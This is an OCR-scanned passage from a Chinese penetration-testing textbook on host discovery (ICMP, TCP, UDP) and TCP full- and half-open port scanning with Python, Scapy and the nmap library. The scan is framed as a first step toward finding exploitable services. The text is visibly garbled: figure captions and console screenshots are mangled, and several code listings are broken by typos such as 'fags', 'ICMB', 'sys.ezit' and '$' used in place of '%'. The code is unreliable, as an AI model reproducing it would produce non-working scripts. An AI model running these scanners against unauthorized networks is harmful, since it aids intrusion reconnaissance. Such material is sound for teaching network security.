-sn 表示 只 测试 该 主机 的 状态 (这 里 是 为 了 加 快 扫描 速度 )。 在 Nmap 中 使 用 ICMP 进行 扫描 
的 语法 格式 为 : 
Nmap -PE -sn [目标 IP] 


现在 使 用 nmap 库 来 实现 对 目标 进行 的 ICMP 扫描 ， 这 个 程序 如 下 所 示 。 


import sys 

if len(sys.argv) != 2: 
print "Usage: icmpPing2 <IP> eg: icmpPing2 192.168.1.1" 
sys.exit(1) 

import nmap 

nm = nmap.PortScanner() 

nm.scan(sys.argv[1], arguments='-PE -sn ') 

for host in nm.all_hosts(): 
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print('Host : %s (%s)' % (host，nm[host] .hostname ())) 
print('State : %s' $ nm[host].state()) 


在 Aptana Studio 3 中 完成 这 个 程序 ， 将 这 个 程序 以 icmpPing2 为 名 保存 起 来 ， 在 Run 
Configurations 中 为 这 个 程序 指定 一 个 参数 “192.168.1.1”"， 然 后 执行 ， 如 图 5-25 所 示 。 


Console x m root@kali:~ © Problems Fi PyUnit 


# x $ Q. G R a BE 


图 5-25 使 用 icmpPing2.py 扫描 192.168.1.1 的 结果 


这 个 程序 也 可 以 用 来 扫描 一 个 范围 内 的 主机 ， 例 如 192.168.1.0/24， 只 需要 为 这 个 程序 
指定 参数 ， 然 后 执行 ， 图 5-26 给 出 了 执行 的 结果 。 


EJ Console x | 画 root@kali:~ © Problems Fù PyUnit 


“x% we s DB 


<terminated> 192.168.1.0/24 


192.168.1.100 () 
ul 


: 192.168.1.103 () 


图 5-26 ”使 用 icmpPing2.py 扫描 192.168.1.0/24 的 结果 


基于 ICMP 的 扫描 是 一 种 很 常见 的 方法 ， 相 比 ARP 只 能 应 用 于 以 太 网 环境 中 的 特点 ， 
这 种 方法 的 应 用 范围 要 广泛 得 多 。 无 论 是 以 太 网 还 是 互联 网 都 可 以 使 用 这 种 方法 。 但 是 基于 
ICMP 的 扫描 的 缺陷 也 很 明显 ， 由 于 大 量 网 络 设备 ， 例 如 很 多 路 由 器 、 防 火 墙 等 都 对 ICMP 
进行 了 屏蔽 ， 这 样 就 会 导致 扫描 结果 不 准确 。 


5.2.3 # TCP 的 活跃 主机 发 现 技 术 


TCP ( Transmission Control Protocol， 传 输 控 制 协议 ) 是 一 个 位 于 传输 层 的 协议 。 它 是 一 
种 面向 连接 的 、 可 靠 的 、 基 于 字 节 流 的 传输 层 通信 协议 ， 由 IETF 的 RFC 793 定义 。TCP 的 
特点 是 使 用 三 次 握手 协议 建立 连接 。 当 主动 方 发 出 SYN 连接 请 求 后 ， 等 待 对 方 回答 TCP 的 
三 次 握手 SYN+ACK， 并 最 终 对 对 方 的 SYN 执行 ACK 确认 。 这 种 建立 连接 的 方法 可 以 防止 
产生 错误 的 连接 .TCP 三 次 握手 的 过 程 如 下 所 示 。 

第 一 步 : 客户 端 发 送 SYN ( SEQ=x) 数据 包 给 服务 器 端 ， 进 入 SYN SEND 状态 ， 如 图 
5-27 所 示 。 
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图 5-27 TCP 三 次 握手 中 的 第 g 次 握手 


第 二 步 : 服务 器 端 收 到 SYN 数据 包 ， 回 应 一 个 SYN (SEQ=y)+ACK(ACK=x+1 ) 数据 包 ， 
进入 SYN_RECYV 状态 ， 如 图 5-28 所 示 。 


图 5-28 TCP 三 次 握手 中 的 第 二 次 握手 
第 三 步 : 客户 端 收 到 服务 器 端的 SYN 数据 包 ， 回 应 一 个 ACK(ACK=y+1 ) 数据 包 ， 进 
入 Established 状态 。 三 次 握手 完成 ，TCP 客户 端 和 服务 器 端 成 功 地 建立 连接 ， 可 以 开始 传输 
数据 ， 如 图 5-29 所 示 。 


==— 
V SYN 
S 
P SYN+ACK 
— 
客户 机 ACK 
图 5-29 TCP 三 次 握手 中 的 第 三 次 握手 


TCP 和 ARP、ICMP 等 协议 并 不 处 于 同一 层 ， 而 是 位 于 它们 的 上 一 层 传输 层 。 在 这 一 层 
中 出 现 了 “端口 ”的 概念 。“ 端 口 ”是 英文 port 的 意译 ， 可 以 认为 是 设备 与 外 界 通信 交流 的 
出 口 。 端 口 可 分 为 虚拟 端口 和 物理 端口 ， 这 里 使 用 的 就 是 虚拟 端口 ， 指 的 是 计算 机 内 部 或 交 
换 机 路 由 器 内 的 端口 ， 例 如 计算 机 中 的 80 端口 、21 端口 、23 端口 等 。 这 些 端 口 可 以 被 不 同 
的 服务 所 使 用 来 进行 各 种 通信 ， 例 如 Web 服务 、FTP 服务 、SMTP 服务 等 ， 这 些 服务 都 是 通 
kË “IP 地址 + 端口 号 ”来 区 分 的 。 

如 果 检 测 到 一 台 主 机 的 某 个 端口 有 回应 ， 也 一 样 可 以 判断 这 台 主 机 是 活跃 主机 。 需 要 
注意 的 是 ， 如 果 一 台 主 机 处 于 活跃 状态 ,那么 它 的 端口 即使 是 关闭 的 ， 在 收 到 请 求 时 ， 也 会 
给 出 一 个 回应 ， 只 不 过 并 不 是 一 个 “SYN+ACK ”数据 包 ， 而 是 一 个 拒绝 连接 的 “RST” 数 
据 包 。 
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这 样 在 检测 目标 主机 是 否 是 活跃 主机 的 时 候 ， 就 可 以 向 目标 的 80 端口 发 送 一 个 SYN 数 
据 包 ,之 后 的 情形 可 能 有 如 下 三 种 。 

第 一 种 : 主机 发 送 的 SYN 数据 包 到 达 了 目标 的 80 端口 处 ,但 是 目标 端口 关闭 了 ， 所 以 
目标 主机 会 发 回 一 个 RST 数据 包 ， 这 个 过 程 如 图 5-30 所 示 。 


l 


x 


RST 


图 5$-30 目标 主机 活跃 但 是 端口 关闭 的 情形 


第 二 种 : 主机 发 送 的 SYN 数据 包 到 达 目 标的 80 端口 处 ， 而 且 目 标 端口 开放 ， 所 以 目标 
主机 会 发 回 一 个 “SYN+ACK ”数据 包 ， 这 个 过 程 如 图 5-31 所 示 。 


2 š 


S SYN+ACK X 
客户 机 服务 器 
图 5-31 目标 主机 活跃 而 且 端 口 开 放 的 情形 
第 三 种 : 主机 发 送 的 SYN 数据 包 到 达 不 了 目标 ， 这 时 就 不 会 收 到 任何 回应 ， 这 个 过 程 
如 图 5-32 所 示 。 


Tcpsw 


之 后 没有 收 到 任何 回应 


客户 机 服务 器 
图 5-32 目标 主机 非 活跃 的 情形 


也 就 是 说 ， 只 要 收 到 了 TCP 回应 ， 就 可 以 判断 该 主机 为 活跃 状态 。 

现在 来 编写 一 个 利用 TCP 实现 的 活跃 主机 扫描 程序 ， 这 个 程序 有 很 多 种 方式 可 以 实现 ， 
首先 借助 Scapy 库 来 完成 。 核 心 的 思想 就 是 要 产生 一 个 TCP 请 求 ， 首 先 查 看 Scapy 库 中 TCP 
类 型 数据 包 中 需要 的 参数 ， 如 图 5-33 所 示 。 

这 里 的 大 多 数 参 数 都 不 需要 设置 ,需要 考虑 的 是 sport、dport 和 flags。sport 是 源 端 口 ， 
dport 是 目的 端口 ， 而 flags 是 标志 位 ， 可 能 的 值 包 括 SYN (建立 连接 )、FIN (关闭 连接 )、 
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ACK (响应 )、PSH (有 DATA 数据 传输 )、RST (连接 重 置 )。 此 处 将 flags REN “Ss”, iè 
是 SYN。 另 外 ，TCP 并 没有 目标 地 址 和 源 地 址 ， 所 以 需要 在 IP 层 进行 设置 。 


ls(TCP) 
sport ShortEnumField 


(None) 
urgptr 和 (0) 
options š y e ({}) 


图 5-33 Scapy 库 中 的 TCP 数据 包 的 参数 
接 下 来 构造 一 个 发 往 192.168.1.2 的 80 端口 的 SYN 请 求 数据 包 并 将 其 发 送出 去 


>>> ans,unans=sr( IP(dst="192.168.1.*")/TCP (dport=80,flags="S") ) 


按照 之 前 的 思路 ， 需 要 对 这 个 请 求 的 回应 进行 监听 ， 如 果 得 到 了 回应 ， 就 证 明 目 标 在 
线 ， 并 打印 输出 这 个 主机 的 IP 地 址 

>>> ans.summary(lambda (s,r): r.sprintf("%IP.src% is alive") ) 

同样 上 面 是 在 命令 行 中 完成 了 这 个 扫描 ， 现 在 编写 一 个 完整 的 TCP 扫描 程序 ， 完 整 的 
旦 序 内 容 如 下 所 示 


import sys 
if len(sys.argv) != 3: 
print "Usage: tcpPing <IP>Nn eg: tcpPing 192.168.1.1 80" 
sys.exit(1) 
from scapy.all import sr,IP,TCP 
ans,unans=sr( IP(dst= sys.argv[1])/TCP (dport=int (sys.argv[2]) ,fags="S") ) 
for snd,rcv in ans: 
print rcv.sprintf("%IP.src% is alive") 


在 Aptana Studio 3 中 完成 这 个 程序 ， 将 这 个 程序 以 “ tcpPing” 为 名 保存 起 来 ， 在 Run 
Configurations 中 为 这 个 程序 指定 两 个 参数 “192.168.1.101 445”"， 如 图 5-34 所 示 。 
然后 执行 这 个 程序 的 结果 如 图 5-35 所 示 。 


| E Console x | root@kali: ~ £ Problems RPyUnit 


| x Q G R aE 


| <terminated> 445 
|445 


$ Main (= @ Interpreter :: Refresh | Begin emission: 

„Finished to send 1 packets. 
Program arguments: . 
192.168.1.101 445 


BI 5-34 DUES 图 5-35 目标 主机 活跃 的 情形 


1 answers, remaining 0 packets 
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也 可 以 使 用 更 为 简单 的 nmap 库 来 实现 这 个 功能 。 在 Nmap 中 使 用 -sT 表示 使 用 TCP， 
但 是 这 里 不 能 使 用 -sn 选项 ， 因 为 这 样 会 跳 过 端口 扫描 。 在 Nmap 中 使 用 TCP 进行 扫描 的 语 
法 格式 为 : 

nm.scan('192.168.169.2', arguments=' -sT') 


现在 使 用 nmap 库 来 实现 对 目标 进行 TCP 扫描 ， 这 个 程序 如 下 所 示 。 


import sys 

if len(sys.argv) != 2: 
print "Usage: tcpPing2 <IP> eg: tcpPing2 192.168.1.1" 
sys.exit(1) 

import nmap 

nm = nmap.PortScanner () 

nm.scan(sys.argv[1], arguments=' -sT') 

for host in nm.all hosts(): 


print('Host : %s (%s)' % (host, nm[host] .hostname ()) 
print('State : %s' % nm[host].state() 


在 Aptana Studio 3 中 完成 这 个 程序 ， 将 这 个 程序 以 “tcpPing2” 为 名 保存 起 来 ,在 Run 
Configurations 中 为 这 个 程序 指定 一 个 参数 “192.168.1.1"， 然 后 执行 ， 如 图 5-36 所 示 。 

这 个 程序 也 可 以 用 来 扫描 一 个 范围 内 的 主机 ， 例 如 192.168.1.0/24， 只 需要 为 这 个 程序 
指定 参数 ， 然 后 执行 ， 图 5-37 给 出 了 执行 的 结果 。 


E Console x |W root@kali: ~ DProblems Ri PyUnit 


= x $Q Q, G ü [EJE 
4 


[© Console x [BB root@kali:~ £ Problems RPyUnit 


mx 多 wa a sJ 


| <terminated> 192.168.1.1 ost : 192.168.1.168 () 


Host : 192.168.1.1 () 


lost : 192.168.1.103 () 
: up 


State : up 


图 5-36 ”使 用 tcpPing2.py 扫描 图 5-37 使 用 tcpPing2.py 扫描 
192.168.1.1 的 结果 192.168.1.0/24 的 结果 


基于 TCP 的 扫描 是 一 种 比较 有 效 的 方法 。 


5.2.4 基于 UDP 的 活跃 主机 发 现 技术 


UDP 全 称 是 用 户 数据 报 协议 ， 在 网 络 中 它 与 TCP 一 样 用 于 处 理 数据 包 ， 是 一 种 无 连接 
的 协议 。 在 OSI 模型 中 位 于 第 4 层 一 一 传输 层 ， 处 于 P 的 上 一 层 。 

但 基于 UDP 的 活跃 主机 发 现 技术 和 TCP 不 同 ，UDP 没有 三 次 握手 。 当 向 目标 发 送 一 
个 UDP 数据 包 之 后 ， 目 标 是 不 会 发 回 任何 UDP 数据 包 的 。 不 过 ， 如 果 目 标 主 机 是 处 于 活 
跃 状态 的 , 但 是 目标 端口 是 关闭 的 时 候 ， 可 以 返回 一 个 ICMP 数据 包 ， 这 个 数据 包 的 含义 为 
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“unreachable”， 过 程 如 图 5-38 所 示 。 


ICMP:unreachable 


x 


图 5-38 目标 主机 活跃 但 是 端口 关闭 的 情形 
如 果 目 标 主机 不 处 于 活跃 状态 ,这 时 是 收 不 到 任何 回应 的 ， 这 个 过 程 如 图 5-39 所 示 。 


一 一， 


N | UDP 
NSS >: 
之 后 没有 收 到 任何 回应 
客户 机 Bz 


图 5-39 目标 主机 非 活跃 的 情形 
接 下 来 构造 一 个 发 往 192.168.1.1 的 6777 端口 的 UDP 数据 包 并 将 其 发 送出 去 。 


>>> ans,unans=sr( IP(dst="192.168.1.1")/UDP(dport=6777) ) 

按照 之 前 的 思路 ， 需 要 对 这 个 请 求 的 回应 进行 监听 ， 如 果 得 到 了 回应 ， 当 然 这 个 回应 是 
ICMP 类 型 的 ， 就 证 明 目 标 在 线 ， 并 打印 输出 这 个 主机 的 IP 地 址 。 

>>> ans.summary(lambda (s,r): r.sprintf("%IP.src% is alive") ) 

也 可 以 使 用 更 为 简单 的 nmap 库 来 实现 这 个 功能 。 在 Nmap 中 使 用 ，-PU 表示 使 用 UDP， 
但 是 这 里 不 能 使 用 -sn 选项 ， 因 为 这 样 会 跳 过 端口 扫描 。 在 Nmap 中 使 用 UDP 进行 扫描 的 语 
法 格式 为 : 

nm.scan('192.168.169.2', arguments='-PU') 


这 里 不 再 详细 完成 这 两 个 程序 ， 读 者 可 以 自行 编写 。 


5.33 端口 扫描 


在 前 面 的 章节 中 已 经 介绍 了 端口 ， 这 是 在 传输 层 才 出 现 的 概念 。 可 以 认为 端口 就 是 设备 
与 外 界 通信 交流 的 出 口 。 例 如 ， 常 见 的 用 来 完成 FTP 服务 的 21 端口 ， 用 来 完成 WWW 服务 
的 80 端口 。 

端口 扫描 在 网 络 安全 渗透 中 是 一 个 十 分 重要 的 概念 。 如 果 把 服务 器 看 作 一 个 房子 ， 那 么 
端口 就 是 通 向 不 同房 间 (服务 ) 的 门 。 入 侵 者 要 占领 这 间 房 子 ， 势 必要 破门 而 人 。 对 于 入 侵 
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者 来 说 ， 这 个 房子 开 了 几 扇 门 ， 都 是 什么 样 的 门 ， 门 后 面 有 什么 东西 都 是 十 分 重要 的 信息 。 

因此 在 信息 收集 阶段 就 需要 对 目标 的 端口 开放 情况 进行 扫描 ， 因 为 一 方面 这 些 端口 可 能 
成 为 进出 的 通道 ， 另 一 方面 利用 这 些 端口 可 以 进一步 获得 目标 主机 上 运行 的 服务 ， 从 而 找到 
可 以 进行 渗透 的 漏洞 。 对 于 网 络 安全 管理 人 员 来 说 ， 对 管理 范围 内 主机 进行 端口 扫描 也 是 做 
好 防范 措施 的 第 一 步 。 

正常 的 情况 下 ， 端 口上 只 有 open (开放 ) 和 closed (关闭 ) 两 种 状态 。 但 是 有 时 网 络 安全 
机 制 会 屏蔽 对 端口 的 探测 ， 因 此 端口 状态 可 能 会 出 现 无 法 判断 的 情况 ， 所 以 在 探测 的 时 候 需 
要 为 端口 加 上 一 个 filtered 状态 ， 表 示 无 法 获悉 目标 端口 的 真正 状态 。 

判断 一 个 端口 的 状态 其 实 是 一 种 很 复杂 的 过 程 ，Nmap 中 就 集成 了 很 多 种 端口 扫描 方法 ， 
这 些 方法 很 有 创意 ， 如 果 读 者 愿意 深入 了 解 ， 可 以 参阅 本 书 的 前 一 部 《 诸 神 之 腿 一 Nmap 
网 络 安全 审计 技术 揭秘 》。 在 本 章 只 介绍 其 中 最 为 常用 的 两 种 方法 : TCP 全 开 扫 描 和 TCP 半 
开 扫 描 。 


5.3.1 基于 TCP 全 开 的 端口 扫描 技术 

首先 介绍 第 一 种 扫描 技术 一 一 TCP 全 开 扫描 。 这 种 扫描 的 思想 很 简单 ， 如 果 目 标 端口 是 
开放 的 ， 那 么 在 接 到 主机 端口 发 出 的 SYN 请 求 之 后 ， 就 会 返回 一 个 SYN+ACK 回应 ， 表 示 
愿意 接受 这 次 连接 的 请 求 ， 然 后 主机 端口 再 回应 一 个 ACK， 这 样 就 成 功 地 和 目标 端口 建立 了 
一 个 TCP 连接 。 这 个 过 程 如 图 5-40 所 示 。 


=.  — — = 
SYN ( 
&=— —— — — — 
SYN+ACK k 
b. — ”’> & 


客户 机 SR 服务 器 
图 5-40 目标 端口 开放 的 情形 


如 果 目 标 端 口 是 关 闭 的 ， 那么 在 接 到 主机 端口 发 出 的 SYN 请 求 之 后 ， 就 会 返回 一 个 
RST 回应 ， 表 示 不 接受 这 次 连接 的 请 求 ， 这 样 就 中 断 了 这 次 TCP 连接 。 这 个 过 程 如 图 5-41 
所 示 。 


图 5-41 目标 主机 端口 不 开放 的 情形 (一 ) 
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但 是 目标 端口 不 开放 还 有 另外 一 种 情况 ， 就 是 当主 机 端口 发 出 SYN 请 求 之 后 ， 没 有 收 
到 任何 的 回应 。 多 种 原因 都 可 能 造成 这 种 情况 ， 例 如 ， 目 标 主机 处 于 非 活跃 状态 ， 这 时 当然 
无 法 进行 回应 ， 不 过 这 也 可 以 认为 端口 是 关闭 的 。 另 外 一 些 网 络 安全 设备 也 会 屏蔽 掉 对 某 些 
端口 的 SYN 请 求 ， 这 时 也 会 出 现 无 法 进行 回应 的 情况 ， 在 本 书 中 暂时 先 不 考虑 后 一 种 情况 。 
这 个 过 程 如 图 5-42 所 示 。 


— 
Y TCP SYN 
Ë 
: 之 后 没有 收 到 任何 回应 


图 5-42 目标 主机 端口 不 开放 的 情形 (二 ) 


在 本 章 前 面 的 部 分 已 经 学 习 了 Scapy 中 下 数据 包 和 TCP 数据 包 的 格式 ， 需 要 注意 的 是 
需要 将 TCP 的 flags 参数 设置 为 “S"， 表 明 这 是 一 个 SYN 请 求 数据 包 。 构 造 这 个 数据 包 的 
语句 如 下 所 示 。 

packet=IP (dst=dst_ip)/TCP (sport=src port, dport=dst_port, flags="S") 

然后 使 用 srl 函数 将 这 个 数据 包 发 送出 去 。 

resp = srl (packet,timeout=10) 

接 下 来 要 根据 收 到 对 应 的 应 答 包 来 判断 目标 端口 的 状态 ， 这 时 会 有 以 下 三 种 情况 。 

第 一 种 : 如 果 此 时 resp 的 值 为 空 ， 就 表示 没有 收 到 来 自 目 标的 回应 。 在 程序 中 可 以 使 
用 str(type(resp)) 来 判断 这 个 resp 是 不 是 为 空 ， 当 type(resp) 的 值 转换 为 字符 串 之 后 为 "<type 
'NoneType'>" 时 就 表明 resp 是 空 ， 也 就 是 没有 收 到 任何 数据 包 ， 直 接 判 断 该 端口 为 closed. 
如 果 不 为 这 个 值 ， 则 说 明 resp 不 为 空 ， 也 就 是 收 到 了 回应 的 数据 包 ， 那么 就 转 到 后 面 的 第 二 
种 或 者 第 三 种 。 

第 二 种 : 当 收 到 了 回应 的 数据 包 之 后 ， 需 要 判断 一 下 这 个 数据 包 是 “SYN+ACK ”类 型 
还 是 “RST” 类 型 的 。 在 Scapy 中 数据 包 的 构造 是 分 层 的 ， 可 以 使 用 haslayer() 函数 来 判断 
这 个 函数 是 否 具 有 某 一 个 协议 ， 例 如 ， 判 断 一 个 数据 包 是 否 使 用 了 TCP， 就 可 以 使 用 haslayer 
(TCP) 来 判断 ， 也 可 以 使 用 getlayer (TCP) 来 读 取 其 中 某 个 字段 的 内 容 。 例 如 ， 可 以 使 用 如 
下 语句 来 判断 回应 数据 包 是 否 为 “SYN+ACK” 类 型 。 

resp.getlayer (TCP) .flags == 0x12 #0x12 就 是 "SYN+ACK" 

如 果 这 个 结果 为 真 ， 表 示 目 标 接受 我 们 的 TCP 请 求 ， 需 要 继续 发 送 一 个 ACK 数据 包 过 
去 ， 完 成 三 次 握手 。 


IP (dst=dst_ip) /TCP (sport=src_port,dport=dst port,flags="AR") 
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第 三 种 : 如 果 resp.getlayer(TCP).flags 的 结果 不 是 0x12， 而 是 0x14 (表示 RST), MAK 
明 目 标 端口 是 关闭 的 。 使 用 如 下 语句 来 判断 这 个 数据 包 是 不 是 RST 类 型 。 
resp.getlayer (TCP) .flags == 0x14 #0x12 就 是 "SYN+ACK" 


按照 上 面 设计 的 思路 编写 一 个 基于 TCP 全 开 的 完整 端口 扫描 程序 。 


import sys 
from scapy.all import * 
if len(sys.argv) != 3: 
print ('Usage:PortScan <IP>Nn eg: PortScan 192.168.1.1 80') 
sys.exit(1) 
dst_ip = sys.argv[1] 
src_port = RandShort () 
dst_port= int( sys.argv[2]) 
packet= IP(dst=dst_ip)/TCP(sport=src_port,dport=dst_port,flags="S") 
resp=sr1 (packet,timeout=10) 
if (str (type (resp))=="<type 'NoneType'>"): 
print "The port %s is Closed" $%( dst_port) 
elif (resp.haslayer (TCP) ): 
if (resp.getlayer (TCP) .flags == 0x12): 
send_rst = sr(IP(dst=dst_ip)/TCP(sport=src_port,dport=dst_ 
port,flags="AR") ,timeout=10) 
print "The port %s is Open" %( dst_port) 
elif (resp.getlayer (TCP) .flags == 0x14): 
print "The port %s is Closed" %( dst port) 


在 Aptana Studio 3 中 完成 这 个 程序 ， 将 这 个 程序 以 “ PortScan ”为 名 保存 起 来 ,在 Run 
Configurations 中 为 这 个 程序 指定 两 个 参数 “192.168.1.1 80”"， 然 后 执行 ， 如 图 5-43 所 示 。 


© Console x B root@kali: ~ 


E Problems RiPyUnit 
x * 9, 局 


<terminated> 80 


Received 2 packets, got 1 answers, remaining 0 packets 
Begin emission: 
Finished to send 1 packets. 


图 5-43 使 用 PortScan.py 扫描 192.168.1.1 主机 80 端口 的 结果 
在 这 个 程序 中 还 使 用 了 RandShort()， 这 个 函数 的 作用 是 产生 一 个 随机 端口 。 因 为 在 和 目 
标 端 口 建 立 TCP 连接 的 时 候 ， 自 己 也 需要 使 用 一 个 源 端 口 ， 使 用 RandShort() 随机 使 用 一 个 


端口 即 可 。 男 外 ， 在 使 用 sr10 发 送 数据 包 的 时 候 ， 使 用 了 timeout， 这 个 参数 的 作用 是 指定 
等 待 回 应 数据 包 的 时 间 。 


gswers, remaining 1 packets 


5.3.2 ”基于 TCP 半 开 的 端口 扫描 技术 
53.1 节 中 介绍 的 基于 TCP 全 开 的 端口 扫描 技术 还 有 一 些 不 完善 的 地 方 ， 例 如 ， 这 次 连 
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接 可 能 会 被 目标 主机 的 日 志 记录 下 来 ， 而 且 最 为 主要 的 是 建立 TCP 连接 三 次 握手 中 的 最 后 一 
次 是 没 用 的 ， 在 目标 返回 一 个 SYN+ACK 类 型 的 数据 包 之 后 ,已 经 达到 了 探测 的 目的 ， 最 后 
发 送 的 ACK 类 型 数据 包 是 不 必要 的 ， 所 以 可 以 考虑 去 除 这 一 步 。 

于 是 一 种 新 的 扫描 技术 产生 了 ， 这 种 扫描 的 思想 很 简单 ， 如 果 目 标 端口 是 开放 的 ， 那 么 
在 接 到 主机 端口 发 出 的 SYN 请 求 之 后 ， 就 会 返回 一 个 SYN+ACK 回应 ， 表 示 愿 意 接受 这 次 
连接 的 请 求 ， 然 后 主机 端口 不 再 回应 一 个 ACK， 而 是 发 送 一 个 RST 表示 中 断 这 个 连接 。 这 
样 实际 上 并 没有 建立 好 完整 的 TCP 连接 ， 所 以 称 为 半 开 。 这 个 过 程 如 图 5-44 所 示 。 


— >, 
S| 一 一 | 
X > 

SYN+ACK 

客户 机 RST 服务 器 


图 5-44 对 目标 主机 开放 的 端口 进行 半 开 扫描 的 过 程 
不 过 ， 如 果 目 标 端口 是 关闭 的 ， 半 开 扫 描 和 全 开 扫描 倒是 没有 区 别 ， 这 个 过 程 如 图 5-45 


所 示 。 
l 


N4 RST 


客户 机 服务 器 
图 5-45 对 目标 主机 关闭 的 端口 进行 半 开 扫描 的 过 程 
在 这 次 半 开 扫描 实例 中 ， 考 虑 一 种 更 为 复杂 的 情况 ， 那 就 是 目标 端口 的 fltered 状态 。 
这 种 状态 往往 是 由 包 过 滤 机 制造 成 的 ， 过 滤 可 能 来 自 专业 的 防火 墙 设备 、 路 由 器 规则 或 者 
主机 上 的 软件 防火 墙 。 这 种 情况 下 会 让 扫描 工作 变 得 很 难 ， 因 为 这 些 端口 几乎 不 提供 任何 信 
息 。 不 过 有 时 候 它们 也 会 响应 ICMP 错误 消息 ， 但 更 多 时 候 包 过 滤 机 制 不 做 出 任何 响应 ， 如 
图 5-46 所 示 。 


之 后 没有 收 到 任何 回应 ss 


| 


客户 机 服务 器 
图 5-46 目标 主机 端口 没有 任何 回应 
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这 样 就 将 没有 收 到 回应 数据 包 的 端口 归于 “filtered” 状 态 。 另 外 ， 考 虑 收 到 ICMP 错误 
消息 的 情形 ， 这 种 情况 下 ， 也 要 将 目标 端口 归于 “filtered” 状 态 。 当 TCP 连接 的 数据 包 被 屏 
蔽 时 ， 一 般 会 返回 如 表 5-1 所 示 的 几 种 ICMP 错误 消息 。 


表 5-1 ICMP 错误 消息 及 意义 


AE VEI == 


协议 不 可 达 
端口 不 可 达 


如 果 收 到 这 几 种 类 型 的 ICMP 数据 包 ， 也 将 目标 端口 的 状态 归 类 到 “filtered ”。 所 以 在 
编写 程序 的 时 候 ， 考 虑 如 下 两 种 情形 

if (str (type (stealth_scan_resp) )=="<type 'NoneType'>"): 

这 种 情形 表示 没有 收 到 任何 的 回应 数据 包 。 


if(int(resp.getlayer (ICMP) .type)==3 and int(resp.getlayer(ICMP) .code) in 
[1;2:3;9,10,131]): 


这 种 情形 表示 的 是 收 到 的 是 ICMP 类 型 的 数据 包 。 
下 面 给 出 了 这 个 程序 的 完整 代码 。 


import sys 

from scapy.all import * 

if len(sys.argv) != 3: 
print ('Usage:PortScan <IP>\n eg: PortScan 192.168.1.1 80') 
sys.ezit(1}) 

dst_ip = sys.argv[1] 

src_port = RandShort () 

dst_port= int( sys.argv[2]) 

packet= IP(dst=dst ip)/TCP(sport=src port, dport=dst port,flags="S") 

resp = srl(packet,timeout=10) 

if (str (type (resp))=="<type ‘NoneType’>"): 


print "The port $s is Filtered " %( dst port) 
elif (resp.haslayer (TCP)): 
if (resp.getlayer (TCP) .flags == 0x12): 
send_rst = sr(IP(dst=dst_ip)/TCP(sport=src_port,dport=dst_ 
port,flags="R") ,timeout=10) 
print "The port %s is Open " %( dst port) 
elif (resp.getlayer (TCP) .flags == 0x14): 


print "The port %s is Closed " $( dst_port) 
elif(resp.haslayer(ICMB)): 
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if(int(getlayer (ICMP) .type)==3 and int(resp.getlayer(ICMP) .code) in 
[1,2,3,9,10,13]) š 
print "The port %s is Filtered " %( dst_port) 


TE Aptana Studio 3 中 完成 这 个 程序 ， 将 这 个 程序 以 “ PortScan” 为 名 保存 起 来 ， 在 Run 
Configurations 中 为 这 个 程序 指定 两 个 参数 “192.168.1.1 80”"， 然 后 执行 ， 如 图 5-47 所 示 。 


| E) Console x E root@kali:~ Œ Problems Fi PyUnit 
= x $ Q. A s| BE) = 


<terminated> 80 

Begin emission: 

| .Finished to send 1 packets. 
* 


[| Received 2 packets, got 1 answers, remaining 0 packets 
[| Begin emission: 

| Finished to send 1 packets. 
| i got 9 answers, remaining 1 packets 
[re port es 1s pe | 

图 5-47 使 用 Portscan.py 扫描 192.168.1.1 主机 80 端口 的 结果 


另外 ， 也 可 以 使 用 nmap 库 来 实现 对 目标 进行 TCP 扫描 。Nmap 中 默认 使 用 的 就 是 半 开 
连接 ， 所 以 连 Nmap 参数 都 无 须 添加 ， 这 个 程序 如 下 所 示 。 


import sys 
import nmap 
if len(sys.argv) != 3: 
print ('Usage:PortScan2 <IP Port>\n eg: PortScan2 192.168.1.1 80-445') 
sys.exit(1) 
target= sys.argv[1] 
port= sys.argv[2] 
nm = nmap.PortScanner() 
nm.scan(target, port) 
for host in nm.all_hosts(): 
Re 
print('Host : {0} ({1})'.format (host，nm[host] .hostname ())) 
print('State : {0}'.format (nm[host].state())) 
for proto in nm[host].all protocols(): 
p#ëlpti("==== === 1} 
print ('Protocol : {0}'.format (proto) ) 
lport = list (nm[host] [proto] .keys ()) 
lport.sort () 
for port in lport: 
print ('port : {0}\tstate : {1}'.format (port, nm[host] [proto] [port] )) 


这 个 程序 本 身 很 简单 ， 但 是 Nmap 扫描 结果 的 格式 很 复杂 ， 关 于 这 个 扫描 结果 的 格式 将 
在 5.4 节 中 详细 介绍 。 
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5.4 服务 扫描 


现在 世界 上 使 用 最 多 的 软件 就 是 微软 公司 的 Windows 操作 系统 了 ， 微 软 公 司 拥有 着 最 优 
秀 的 开发 团队 ， 但 是 这 个 系列 的 操作 系统 仍然 不 断 会 出 现 各 种 问题 。 几 乎 每 隔 一 段 时 间 ， 系 
统 就 会 提醒 用 户 安装 一 些 补丁 文件 ， 这 些 修复 同时 也 意味 着 出 现 了 系统 漏洞 。 

可 是 平时 所 使 用 的 软件 除了 操作 系统 之 外 ， 还 有 大 量 的 其 他 应 用 程序 。 这 些 应 用 软件 的 
质量 参差 不 齐 ， 有 可 以 和 微软 比肩 的 国际 型 IT 企业 开发 的 ， 也 有 个 人 开发 的 。 这 些 应 用 软 
件 大 都 也 存在 着 漏洞 ， 它 们 更 是 网 络 安 全 的 重 灾区 。 如 果 目 标 使 用 这 些 软 件 对 外 提供 网 络 服 
务 ， 攻 击 者 就 有 可 能 利用 这 个 网 络 服务 的 漏洞 入 侵 。 

因此 ， 在 对 目标 进行 渗透 测试 的 时 候 ， 要 尽量 地 检测 出 目标 系统 运行 的 各 种 服务 。 对 于 
入 侵 者 来 说 ， 发 现 这 些 运 行 在 目标 上 的 服务 ， 就 可 以 利用 这 些 软件 上 的 漏洞 入 侵 目标 ;对 于 
网 络 安全 的 维护 者 来 说 ， 也 可 以 提前 发 现 系统 的 漏洞 ， 从 而 预防 这 些 人 侵 行为 。 

不 使 用 库 来 编写 一 个 对 目标 服务 进行 扫描 的 程序 难度 要 远 远 大 于 我 们 之 前 的 工作 ， 这 里 
首先 介绍 一 下 这 个 服务 扫描 的 思路 。 

很 多 扫描 工具 都 采用 了 一 种 十 分 简单 的 方式 ， 因 为 通常 常见 的 服务 都 会 运行 在 指定 的 端 
口上 ,例如 ，FTP 服务 上 总 会 运行 在 21 号 端口 上 ， 而 HTTP 服务 总 会 运行 在 80 端口 上 。 因 
为 这 些 端口 都 是 公 知 端口 ， 所 以 只 需要 知道 目标 上 哪个 端口 是 开放 的 ， 就 可 以 猜测 出 目标 
